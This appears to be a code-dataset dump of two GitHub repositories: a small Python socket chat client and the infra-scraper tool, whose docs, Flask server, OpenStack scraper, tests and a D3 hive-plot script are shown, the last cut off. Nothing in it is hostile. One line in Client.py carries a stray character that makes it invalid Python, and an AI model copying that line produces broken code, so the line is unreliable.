NeziY/Server-Client-Messaging
https://github.com/NeziY/Server-Client-Messaging
f02096f8da6c6347d9187275aebd8ffdd603e989
049a43dc6b959ace6ba8bcc293931df9df4c2eff
17b1cbc1243b76548783c2c92ab0d71a6fecf99e
refs/heads/master
2021-01-10T15:52:42.298257
2016-02-05T15:04:38
2016-02-05T15:04:38
51,153,039
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8399999737739563, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 25, "blob_id": "90a20038fed5a939a6be094cd4036517dcc75312", "content_id": "969bab17e2e26894679cec180592c0cd237c4432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "no_license", "max_line_length": 25, "num_lines": 1, "path": "/README.md", "repo_name": "NeziY/Server-Client-Messaging", "src_encoding": "UTF-8", "text": "# Server-Client-Messaging" }, { "alpha_fraction": 0.5142095685005188, "alphanum_fraction": 0.5355239510536194, "avg_line_length": 17.766666412353516, "blob_id": "7daef017b6818b2e9920755321fbc34afdd2748a", "content_id": "c3ba04e0a5237d57b0a8239eee9a5dff1cada48d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1127, "license_type": "no_license", "max_line_length": 49, "num_lines": 60, "path": "/Client.py", "repo_name": "NeziY/Server-Client-Messaging", "src_encoding": "UTF-8", "text": "import socket\nimport sys\nimport threading\nfrom queue import Queue\n\nNUMBER_OF_THREADS = 2\nJOB_NUMBER =æ [1, 2]\nqueue = Queue()\n\n\ndef socket_create():\n global host\n global port\n global s\n host = '192.168.1.41'\n port = 2020\n s = socket.socket()\n s.connect((host, port))\n\ndef listen_for_msg():\n while True:\n data = s.recv(1024)\n data_str = str(data[:].decode(\"utf-8\"))\n if data_str != \" \":\n print(data_str)\n\ndef send_msg():\n while True:\n sent_msg = input()\n if sent_msg != \" \":\n s.send(str.encode(sent_msg, \"utf-8\"))\n elif sent_msg == \"quit\":\n s.close()\n\ndef create_worker():\n for _ in range(NUMBER_OF_THREADS):\n t = threading.Thread(target=work)\n t.daemon = True\n t.start()\n\ndef work():\n while True:\n x = queue.get()\n if x == 1:\n listen_for_msg()\n if x == 2:\n send_msg()\n queue.task_done()\n\n\n# Each list item is a new job\n\ndef create_jobs():\n for x in JOB_NUMBER:\n queue.put(x)\n queue.join()\n\nsocket_create()\ncreate_worker()\ncreate_jobs()\n" } ]
2
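Client.py above fans two jobs (listen, send) out to daemon worker threads through a `Queue`. A bare, self-contained sketch of that worker/queue pattern, with the socket work replaced by placeholder tasks (the task bodies here are hypothetical):

```python
# Worker/queue fan-out as in Client.py: N daemon threads pull job ids
# from a Queue and dispatch to the matching task.
import threading
from queue import Queue

JOBS = [1, 2]          # one id per task, as in JOB_NUMBER above
queue = Queue()


def listen():          # placeholder for the socket-recv loop
    print("listening once")


def send():            # placeholder for the input/send loop
    print("sending once")


def work():
    while True:
        job = queue.get()
        if job == 1:
            listen()
        elif job == 2:
            send()
        queue.task_done()


for _ in range(len(JOBS)):
    threading.Thread(target=work, daemon=True).start()

for job in JOBS:
    queue.put(job)
queue.join()           # returns here because the placeholder tasks finish
```

Note that in the original client each task loops forever, so `queue.task_done()` is never reached and `queue.join()` never returns; the pattern there effectively dedicates one thread per job id.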
slimakcz/infra-scraper
https://github.com/slimakcz/infra-scraper
69b168df0be428372610b904c3e41cfd51d7d514
9329ccc7fa68744007b46a2e16d2e833db266208
d50097fb3d7ed0e6b52f6b41e5f196310de7844c
refs/heads/master
2021-05-14T15:40:15.066936
2017-12-24T11:50:24
2017-12-24T11:50:24
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6302521228790283, "alphanum_fraction": 0.6344537734985352, "avg_line_length": 25.33333396911621, "blob_id": "6d0e9244a7c9f03d90a450891320f247f3a65dce", "content_id": "bfc1a2da2bdc258106ef136b03d9449971f97ad5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 238, "license_type": "permissive", "max_line_length": 71, "num_lines": 9, "path": "/doc/source/text/input-amazon.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===================\nAmazon Web Services\n===================\n\nAWS scraping uses ``boto3`` high level AWS python SDK for accessing and\nmanipulating AWS resources.\n\n.. literalinclude:: ../static/config/config-amazon.yaml\n :language: yaml\n" }, { "alpha_fraction": 0.6253541111946106, "alphanum_fraction": 0.6260623335838318, "avg_line_length": 24.196428298950195, "blob_id": "8294859aedd3a378bdf9f7f1a2ef86b6abf5bbfb", "content_id": "db16282e1fd425d7755222884daebd7288220958", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "permissive", "max_line_length": 65, "num_lines": 56, "path": "/infra_scraper/server.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom flask import Flask, redirect, render_template, jsonify\nfrom collections import OrderedDict\nfrom .main import InfraScraper\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\napp = Flask(__name__, static_folder='./assets/static')\n\n\[email protected]('/')\ndef index():\n scraper = InfraScraper()\n config = scraper.status()\n# endpoints = config['endpoints'].copy()\n# config['endpoints'] = OrderedDict(\n# reversed(sorted(endpoints.items(), key=lambda x: x[1])))\n return render_template('index.html',\n config=config)\n\n\[email protected]('/layout/<name>/<layout>')\ndef topology_layout(name, layout):\n scraper = InfraScraper()\n config = scraper.get_config(name)\n return render_template('layout.html',\n name=name,\n config=config,\n layout=layout)\n\n\[email protected]('/api/<name>/scrape')\ndef scrape_data(name=None):\n scraper = InfraScraper()\n scraper.scrape_data(name)\n return redirect('.')\n\n\[email protected]('/api/<name>')\ndef topology_data(name=None):\n scraper = InfraScraper()\n data = scraper.get_cached_data(name, 'vis')\n return jsonify(data)\n\n\[email protected]('/api/<name>/hier')\ndef hierarchy_topology_data(name=None):\n scraper = InfraScraper()\n data = scraper.get_cached_data(name, 'vis-hier')\n return jsonify(data)\n\n\ndef run(*args, **kwargs):\n app.run(*args, **kwargs)\n" }, { "alpha_fraction": 0.723770022392273, "alphanum_fraction": 0.7599288821220398, "avg_line_length": 41.17499923706055, "blob_id": "7ff899cc6c0a164868e66761a239d5ba68fce85e", "content_id": "e7a3cbb417d15766ab95548bbf3e6606c26d8bb3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1693, "license_type": "permissive", "max_line_length": 95, "num_lines": 40, "path": "/doc/source/text/layout-force.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n====================\nForce-Directed Graph\n====================\n\n`Force-directed graph` drawing algorithms are used for drawing graphs in an\naesthetically pleasing way. 
Their purpose is to position the nodes of a graph\nin two-dimensional or three-dimensional space so that all the edges are of\nmore or less equal length and there are as few crossing edges as possible, by\nassigning forces among the set of edges and the set of nodes, based on their\nrelative positions, and then using these forces either to simulate the motion\nof the edges and nodes or to minimize their energy.\n\nWhile graph drawing can be a difficult problem, force-directed algorithms,\nbeing physical simulations, usually require no special knowledge about graph\ntheory such as planarity.\n\nGood-quality results can be achieved for graphs of medium size (up to 50–500\nvertices), the results obtained have usually very good results based on the\nfollowing criteria: uniform edge length, uniform vertex distribution and\nshowing symmetry. This last criterion is among the most important ones and is\nhard to achieve with any other type of algorithm.\n\n\nSample Visualizations\n=====================\n\n.. figure:: ../static/img/force-directed-plot.png\n :width: 600px\n :figclass: align-center\n\n Force-directed plot of all OpenStack resources (cca 3000 nodes)\n\n\nMore Information\n================\n\n* https://en.wikipedia.org/wiki/Force-directed_graph_drawing\n* https://bl.ocks.org/shimizu/e6209de87cdddde38dadbb746feaf3a3 (shimizu’s D3 v4 - force layout)\n* https://bl.ocks.org/mbostock/3750558 (Mike Bostock’s Sticky Force Layout)\n* https://bl.ocks.org/emeeks/302096884d5fbc1817062492605b50dd (D3v4 Constraint-Based Layout)" }, { "alpha_fraction": 0.647773265838623, "alphanum_fraction": 0.647773265838623, "avg_line_length": 21.409090042114258, "blob_id": "ded15786ac286c7365f130eadbafa64db941ad54", "content_id": "5d0a1d2927765ab58a611cb3b283b67309b36617", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 494, "license_type": "permissive", "max_line_length": 49, "num_lines": 22, "path": "/infra_scraper/storage/base.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseStorage(object):\n\n def __init__(self, **kwargs):\n self.name = kwargs.get('name')\n self.last_timestamp = None\n\n def save_data(self, name, data):\n raise NotImplementedError\n\n def load_data(self, name):\n raise NotImplementedError\n\n def save_output_data(self, name, kind, data):\n raise NotImplementedError\n\n def load_output_data(self, name, kind):\n raise NotImplementedError\n" }, { "alpha_fraction": 0.6812297701835632, "alphanum_fraction": 0.6812297701835632, "avg_line_length": 15.210526466369629, "blob_id": "56f327b1e87d159d873def8b1cadd580cc9c1b30", "content_id": "f2079ab4c72fa8aa21e5745d30dc4817cae86d6b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 618, "license_type": "permissive", "max_line_length": 75, "num_lines": 38, "path": "/doc/source/text/app-usage.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=====\nUsage\n=====\n\nThe application comes with several entry commands:\n\n\nScraping Commands\n=================\n\n**scraper_get <endpoint-name>**\n\n Scrape single endpoint once.\n\n**scraper_get_forever <endpoint-name>**\n\n Scrape single endpoint continuously.\n\n**scraper_get_all**\n\n Scrape all defined endpoints once.\n\n**scraper_get_all_forever**\n\n Scrape all defined endpoints continuously.\n\n\nUI and Utility 
Commands\n=======================\n\n**scraper_status**\n\n  Display the service status, endpoints, scrapes, etc.\n\n**scraper_web**\n\n  Start the UI with visualization samples and API that provides the scraped\n  data.\n\n" }, { "alpha_fraction": 0.7067039012908936, "alphanum_fraction": 0.7067039012908936, "avg_line_length": 34.70000076293945, "blob_id": "ab983802ee737657ab92f0ccee477a256e07f2f1", "content_id": "6fe2d7fcdf523d2180d09071abcc758d1b827969", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 358, "license_type": "permissive", "max_line_length": 78, "num_lines": 10, "path": "/doc/source/text/input-kubernetes.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===================\nKubernetes Clusters\n===================\n\nKubernetes requires some information from the ``kubeconfig`` file. You provide\nthe parameters of the cluster and the user to the scraper. These can be found\nunder the corresponding keys in the kubernetes configuration file.\n\n.. literalinclude:: ../static/config/config-kubernetes.yaml\n   :language: yaml\n" }, { "alpha_fraction": 0.4912891983985901, "alphanum_fraction": 0.4947735071182251, "avg_line_length": 15.052631378173828, "blob_id": "a064dbd88d46033e099e340660e3c77369e3e6ec", "content_id": "1c8e25c6fca66fb6c9d68aff1990def91d30a7d0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 287, "license_type": "permissive", "max_line_length": 26, "num_lines": 19, "path": "/doc/source/index.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n==========================\nInfraScraper Documentation\n==========================\n\n.. toctree::\n   :maxdepth: 3\n   :glob:\n\n   text/app-index.rst\n   text/input-index.rst\n   text/layout-index.rst\n\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5056818127632141, "avg_line_length": 13.583333015441895, "blob_id": "0d101fd88937aeddc6d681a75f33b65248e3aff2", "content_id": "f2f1492e27df6fe5c56b8cad5265e220b1a1774d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 176, "license_type": "permissive", "max_line_length": 25, "num_lines": 12, "path": "/doc/source/text/app-index.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n====================\nApplication Overview\n====================\n\n.. toctree::\n   :maxdepth: 2\n\n   app-install.rst\n   app-config.rst\n   app-usage.rst\n\n.. 
app-architecture.rst\n" }, { "alpha_fraction": 0.6042780876159668, "alphanum_fraction": 0.6106951832771301, "avg_line_length": 24.256755828857422, "blob_id": "a343215320c0688e9a0d433a07fa18f0a599c9de", "content_id": "57975187c3c0bc98bd631e43fa5c42b2971a3eec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1870, "license_type": "permissive", "max_line_length": 79, "num_lines": 74, "path": "/infra_scraper/utils.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport os\nimport re\nimport json\nimport yaml\nimport logging\n\n_schema_dir = os.path.join(\n os.path.dirname(os.path.realpath(__file__)), 'schema')\n\n\ndef setup_logger(name):\n msg_format = '%(asctime)s [%(levelname)s] [%(module)s] %(message)s'\n formatter = logging.Formatter(fmt=msg_format)\n\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n return logger\n\n\ndef load_yaml_json_file(path):\n if os.path.exists(path):\n with open(path, 'r') as f:\n if path.endswith('json'):\n return json.load(f)\n else:\n return yaml.safe_load(f)\n return {}\n\n\ndef get_graph_schema(name):\n schema_file = os.path.join(_schema_dir, 'resource', '{}.yaml'.format(name))\n return load_yaml_json_file(schema_file)\n\n\ndef get_node_icon(icon):\n family, character = icon.split(\":\")\n output = ICON_MAPPING['character'][family][character].copy()\n output[\"family\"] = ICON_MAPPING['family'][family]\n output['name'] = character\n output[\"char\"] = int(\"0x{}\".format(output[\"char\"]), 0)\n return output\n\n\ndef to_camel_case(snake_str, first=True):\n components = snake_str.split('_')\n if first:\n return \"\".join(x.title() for x in components)\n else:\n return components[0] + \"\".join(x.title() for x in components[1:])\n\n\ndef to_snake_case(name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\nclass ClassRegistry:\n\n def __init__(self):\n self._classes = {}\n\n def add(self, cls):\n self._classes[cls.__name__] = cls\n\n def get_type(self, name):\n return self._classes.get(name)\n\n\nicon_file = os.path.join(_schema_dir, 'icon.yaml')\nICON_MAPPING = load_yaml_json_file(icon_file)\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 48.5, "blob_id": "dc7340350ef8f40c4d8ed8e7e0dad173a0e3f9cd", "content_id": "29c8392bf6a6cea8e15bfde133399ca20374cbc2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "permissive", "max_line_length": 58, "num_lines": 2, "path": "/infra_scraper/exceptions.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nclass InfraScraperException(Exception):\n \"\"\"Something went wrong with parsing infra scraper.\"\"\"\n" }, { "alpha_fraction": 0.5345703959465027, "alphanum_fraction": 0.5350544452667236, "avg_line_length": 41.30375289916992, "blob_id": "77a8690010c8a05cc0055e21e426b37de10f0bd1", "content_id": "2012961695061c7ff628fd53cfaaf16585674571", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12395, "license_type": "permissive", "max_line_length": 88, "num_lines": 293, "path": "/infra_scraper/input/openstack.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- 
coding: utf-8 -*-\n\nimport os\nimport yaml\nimport tempfile\nimport os_client_config\nfrom os_client_config import cloud_config\nfrom heatclient.exc import HTTPBadRequest\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.openstack')\n\n\nclass OpenStackInput(BaseInput):\n\n def __init__(self, **kwargs):\n self.kind = 'openstack'\n self.scope = kwargs.get('scope', 'local')\n super(OpenStackInput, self).__init__(**kwargs)\n config_file, filename = tempfile.mkstemp()\n config_content = {\n 'clouds': {self.name: self.config}\n }\n os.write(config_file, yaml.safe_dump(config_content).encode())\n os.close(config_file)\n self.cloud = os_client_config.config \\\n .OpenStackConfig(config_files=[filename]) \\\n .get_one_cloud(cloud=self.name)\n os.remove(filename)\n self.identity_api = self._get_client('identity')\n self.compute_api = self._get_client('compute')\n self.network_api = self._get_client('network')\n self.orch_api = self._get_client('orchestration')\n self.image_api = self._get_client('image')\n self.volume_api = self._get_client('volume')\n\n def _get_client(self, service_key):\n constructor = cloud_config._get_client(service_key)\n return self.cloud.get_legacy_client(service_key, constructor)\n\n def scrape_all_resources(self):\n if self.scope == 'global':\n self.scrape_keystone_projects()\n# self.scrape_keystone_users()\n self.scrape_cinder_volumes()\n self.scrape_glance_images()\n if self.scope == 'global':\n self.scrape_nova_aggregates()\n self.scrape_nova_hypervisors()\n self.scrape_nova_keypairs()\n self.scrape_nova_flavors()\n self.scrape_nova_servers()\n# self.scrape_nova_security_groups()\n self.scrape_neutron_networks()\n self.scrape_neutron_subnets()\n self.scrape_neutron_floating_ips()\n self.scrape_neutron_routers()\n self.scrape_neutron_ports()\n self.scrape_heat_stacks()\n # self.scrape_heat_resource_types()\n\n def _create_relations(self):\n # Define relationships between project and all namespaced resources.\n for resource_type, resource_dict in self.resources.items():\n for resource_id, resource in resource_dict.items():\n if 'tenant_id' in resource['metadata']:\n self._scrape_relation(\n 'in_os_project',\n resource_id,\n resource['metadata']['tenant_id'])\n elif 'project' in resource['metadata']:\n self._scrape_relation(\n 'in_os_project',\n resource_id,\n resource['metadata']['project'])\n\n for resource_id, resource in self.resources.get('os_stack', {}).items():\n for ext_res in resource['metadata']['resources']:\n if ext_res['resource_type'] in self._get_resource_mapping():\n self._scrape_relation(\n 'os_stack-{}'.format(\n self._get_resource_mapping()[ext_res['resource_type']]),\n resource_id,\n ext_res['physical_resource_id'])\n\n # Define relationships between aggregate zone and all hypervisors.\n for resource_id, resource in self.resources.get('os_aggregate', {}).items():\n for host in resource['metadata']['hosts']:\n self._scrape_relation(\n 'in_os_aggregate',\n host,\n resource_id)\n\n for resource_id, resource in self.resources.get('os_floating_ip', {}).items():\n if resource['metadata'].get('port_id', None) is not None:\n self._scrape_relation(\n 'use_os_port',\n resource_id,\n resource['metadata']['port_id'])\n\n for resource_id, resource in self.resources.get('os_port', {}).items():\n self._scrape_relation(\n 'in_os_net',\n resource_id,\n resource['metadata']['network_id'])\n if resource['metadata']['device_id'] is not None:\n self._scrape_relation(\n 'use_os_port',\n 
resource['metadata']['device_id'],\n resource_id)\n if self.scope == 'global':\n if resource['metadata'].get('binding:host_id', False):\n self._scrape_relation(\n 'on_os_hypervisor',\n resource_id,\n resource['metadata']['binding:host_id'])\n\n for resource_id, resource in self.resources.get('os_server', {}).items():\n if self.scope == 'global':\n self._scrape_relation(\n 'on_os_hypervisor',\n resource_id,\n resource['metadata']['OS-EXT-SRV-ATTR:host'])\n\n self._scrape_relation(\n 'use_os_flavor',\n resource_id,\n resource['metadata']['flavor']['id'])\n\n if resource['metadata']['image'] != '':\n if resource['metadata']['image'].get('id', None) is not None:\n self._scrape_relation(\n 'use_os_image',\n resource_id,\n resource['metadata']['image']['id'])\n\n if resource['metadata']['keypair_name'] != '':\n self._scrape_relation(\n 'use_os_key_pair',\n resource_id,\n resource['metadata']['keypair_name'])\n\n for resource_id, resource in self.resources.get('os_subnet', {}).items():\n self._scrape_relation(\n 'in_os_net',\n resource_id,\n resource['metadata']['network_id'])\n\n def scrape_keystone_users(self):\n users = self.identity_api.get('/users')\n for user in users:\n resource = user.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_user', None, metadata=resource)\n\n def scrape_keystone_projects(self):\n projects = self.identity_api.tenants.list()\n for project in projects:\n resource = project.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_project', None, metadata=resource)\n\n def scrape_nova_aggregates(self):\n response = self.compute_api.aggregates.list()\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['name'], resource['name'],\n 'os_aggregate', None, metadata=resource)\n\n def scrape_nova_keypairs(self):\n response = self.compute_api.keypairs.list()\n for item in response:\n resource = item.to_dict()['keypair']\n self._scrape_resource(resource['name'],\n resource['name'],\n 'os_key_pair', None, metadata=resource)\n\n def scrape_nova_flavors(self):\n response = self.compute_api.flavors.list()\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['id'],\n resource['name'],\n 'os_flavor', None, metadata=resource)\n\n def scrape_nova_hypervisors(self):\n response = self.compute_api.hypervisors.list()\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['service']['host'],\n resource['hypervisor_hostname'],\n 'os_hypervisor', None, metadata=resource)\n\n def scrape_nova_servers(self):\n if self.scope == 'global':\n search_opts = {'all_tenants': 1}\n else:\n search_opts = None\n response = self.compute_api.servers.list(\n search_opts=search_opts)\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_server', None, metadata=resource)\n\n def scrape_nova_security_groups(self):\n response = self.compute_api.security_groups.list(\n search_opts={'all_tenants': 1})\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_security_group', None, metadata=resource)\n\n def scrape_cinder_volumes(self):\n response = self.volume_api.volumes.list()\n for item in response:\n resource = item.to_dict()\n self._scrape_resource(resource['id'], resource['name'],\n 'os_volume', None, metadata=resource)\n\n def scrape_glance_images(self):\n response = self.image_api.images.list()\n for item in response:\n resource = 
item.__dict__['__original__']\n self._scrape_resource(resource['id'], resource['name'],\n 'os_image', None, metadata=resource)\n\n def scrape_neutron_routers(self):\n resources = self.network_api.list_routers().get('routers')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['id'],\n 'os_router', None, metadata=resource)\n\n def scrape_neutron_floating_ips(self):\n resources = self.network_api.list_floatingips().get('floatingips')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['id'],\n 'os_floating_ip', None, metadata=resource)\n\n def scrape_neutron_floating_ip_associations(self):\n resources = self.network_api.list_floatingips().get('floatingips')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['id'],\n 'os_floating_ip_association', None, metadata=resource)\n\n def scrape_neutron_networks(self):\n resources = self.network_api.list_networks().get('networks')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['name'],\n 'os_net', None, metadata=resource)\n\n def scrape_neutron_subnets(self):\n resources = self.network_api.list_subnets().get('subnets')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['name'],\n 'os_subnet', None, metadata=resource)\n\n def scrape_neutron_ports(self):\n resources = self.network_api.list_ports().get('ports')\n for resource in resources:\n self._scrape_resource(resource['id'], resource['name'],\n 'os_port', None, metadata=resource)\n\n # heat resources\n\n def scrape_heat_resource_types(self):\n resource_types = self.orch_api.resource_types.list(\n search_opts={'all_tenants': 1})\n for resource_type in resource_types:\n resource = resource_type.to_dict()\n self._scrape_resource(resource, resource,\n 'os_resource_type', None, metadata=resource)\n\n def scrape_heat_stacks(self):\n if self.scope == 'global':\n search_opts = {'all_tenants': 1}\n else:\n search_opts = None\n stacks = self.orch_api.stacks.list(\n search_opts=search_opts)\n for stack in stacks:\n resource = stack.to_dict()\n resource['resources'] = []\n try:\n resources = self.orch_api.resources.list(stack.id,\n nested_depth=2)\n for stack_resource in resources:\n resource['resources'].append(stack_resource.to_dict())\n except HTTPBadRequest as exception:\n logger.error(exception)\n self._scrape_resource(resource['id'], resource['stack_name'],\n 'os_stack', None, metadata=resource)\n" }, { "alpha_fraction": 0.7415637969970703, "alphanum_fraction": 0.7646090388298035, "avg_line_length": 36.96875, "blob_id": "fcf346c03ce6938dd787ce525b32fc015b4b7d79", "content_id": "17807f320fba92aaaf00045f49a0c6b540306db1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1219, "license_type": "permissive", "max_line_length": 107, "num_lines": 32, "path": "/doc/source/text/layout-matrix.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n================\nAdjacency Matrix\n================\n\nAn adjacency matrix is a square matrix used to represent a finite graph. The\nelements of the matrix indicate whether pairs of vertices are adjacent or not\nin the graph.\n\nIn the special case of a finite simple graph, the adjacency matrix is a\n(0,1)-matrix with zeros on its diagonal. If the graph is undirected, the\nadjacency matrix is symmetric. 
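Building such a matrix from scraped data is straightforward. A minimal\nsketch, assuming the node/relation shape used by the bundled visualizations\n(the ``source``/``target`` field names are taken from them; adapt as needed):\n\n.. code-block:: python\n\n    def adjacency_matrix(resources, relations):\n        # resources: iterable of node ids\n        # relations: iterable of {'source': ..., 'target': ...} dicts\n        index = {node: i for i, node in enumerate(resources)}\n        n = len(index)\n        matrix = [[0] * n for _ in range(n)]\n        for rel in relations:\n            i, j = index[rel['source']], index[rel['target']]\n            matrix[i][j] = 1\n            matrix[j][i] = 1  # undirected graph, hence a symmetric matrix\n        return matrix\n\n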
The relationship between a graph and the\neigenvalues and eigenvectors of its adjacency matrix is studied in spectral\ngraph theory.\n\nThe adjacency matrix should be distinguished from the incidence matrix for a\ngraph, a different matrix representation whose elements indicate whether\nvertex–edge pairs are incident or not, and degree matrix which contains\ninformation about the degree of each vertex.\n\n.. figure:: ../static/img/adjacency-matrix.png\n :width: 100%\n :figclass: align-center\n\n Adjacency matrix of OpenStack project's resources (cca 100 nodes)\n\n\nMore Information\n================\n\n* https://github.com/micahstubbs/d3-adjacency-matrix-layout\n* https://bl.ocks.org/micahstubbs/7f360cc66abfa28b400b96bc75b8984e (Micah Stubbs’s adjacency matrix layout)\n* https://en.wikipedia.org/wiki/Adjacency_matrix" }, { "alpha_fraction": 0.7081966996192932, "alphanum_fraction": 0.7098360657691956, "avg_line_length": 28, "blob_id": "1a5314cbe7c5b7ede52c321f4b74f4a2ed135b35", "content_id": "206cd4b36a32cda711031b77d641abbd5b65fc1c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 610, "license_type": "permissive", "max_line_length": 85, "num_lines": 21, "path": "/infra_scraper/tests/test_main.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport pytest\nimport json\nimport os\n\nfrom infra_scraper.main import _get_module\n\nmodules_file = os.path.join(\n os.path.dirname(os.path.realpath('{}/..'.format(__file__))), 'constructors.json')\n\nwith open(modules_file) as fileneco:\n modules_dict = json.loads(fileneco.read())\n\nmodules_list = []\n\nfor module_label, module_class in modules_dict.items():\n modules_list.append((module_label, module_class))\n\n\[email protected](\"test_input,expected_class\", modules_list)\ndef test_load_module(test_input, expected_class):\n assert _get_module(test_input).__name__ == expected_class.split('.')[-1]\n" }, { "alpha_fraction": 0.5156431198120117, "alphanum_fraction": 0.5215527415275574, "avg_line_length": 34.224491119384766, "blob_id": "22ce2b86febc28c3bde7cd67f5df3df217f83d36", "content_id": "6d1a6cb1958e17b40482a2aa5edcd76000a604f8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8630, "license_type": "permissive", "max_line_length": 106, "num_lines": 245, "path": "/infra_scraper/assets/static/js/d3.plot.hive.js", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nvar HivePlot = {\n init: function(container, data, config) {\n config = config || {};\n if (!data) {\n throw new Error(\"Cannot initialize Hive plot, invalid data provided: \" + data);\n }\n var width = config.width || \"auto\",\n height = config.height || \"auto\",\n radius = config.radius || \"auto\",\n selector = config.selector,\n axisMapping = {},\n radiusMapping = {},\n itemCounters = {},\n itemStep = {},\n getNodeCode = function(node){\n //TODO: entities can have code\n return node.name.replace(/[\\s\\.]/g,\"_\");\n };\n\n relationalPlotHelpers.displayResources(Object.keys(data.resources).length);\n relationalPlotHelpers.displayRelations(data.relations.length);\n relationalPlotHelpers.displayScrapeTime(data.date);\n\n\n function render(){\n var container = d3.select(selector),\n targetHeight=height,\n targetWidth=width,\n targetRadius=radius;\n if(width === \"auto\"){\n targetWidth = container.node().clientWidth;\n }\n if(height === \"auto\"){\n targetHeight = 
container.node().clientHeight;\n }\n if(radius === \"auto\"){\n targetRadius= Math.min(targetWidth, targetHeight) * 0.4;\n }\n container.html(\"\");\n var plotFunctions = {\n createAxes: function(items) {\n return items.map(function(item, index) {\n item.icon.color = d3.schemeCategory20[index];\n iconMapping[item.kind] = item.icon;\n itemCounters[item.kind] = 0;\n axisMapping[item.kind] = item.x;\n itemStep[item.kind] = 1 / item.items;\n radiusMapping[item.kind] = d3.scaleLinear()\n .range([item.innerRadius*targetRadius, item.outerRadius*targetRadius]);\n return item;\n });\n },\n createNodes: function(items) {\n return items.map(function(item) {\n item[\"x\"] = axisMapping[item.kind];\n itemCounters[item.kind]++;\n item[\"y\"] = itemCounters[item.kind];\n return item;\n });\n },\n createLinks: function(nodes, relations) {\n return relations.map(function(link) {\n var retLink = {};\n nodes.forEach(function(node) {\n if (link.source == node.id) {\n retLink.source = node;\n } else if (link.target == node.id) {\n retLink.target = node;\n }\n });\n if (!retLink.hasOwnProperty(\"source\") || !retLink.hasOwnProperty(\"target\")) {\n console.log(\"Can not find relation node for link \" + link);\n retLink = link;\n }\n return retLink;\n });\n }\n };\n\n if (typeof data.axes === 'object') {\n data.axes = Object.values(data.axes);\n }\n\n if (typeof data.resources === 'object') {\n data.resources = Object.values(data.resources);\n }\n\n var axes = plotFunctions.createAxes(data.axes);\n var nodes = plotFunctions.createNodes(data.resources);\n 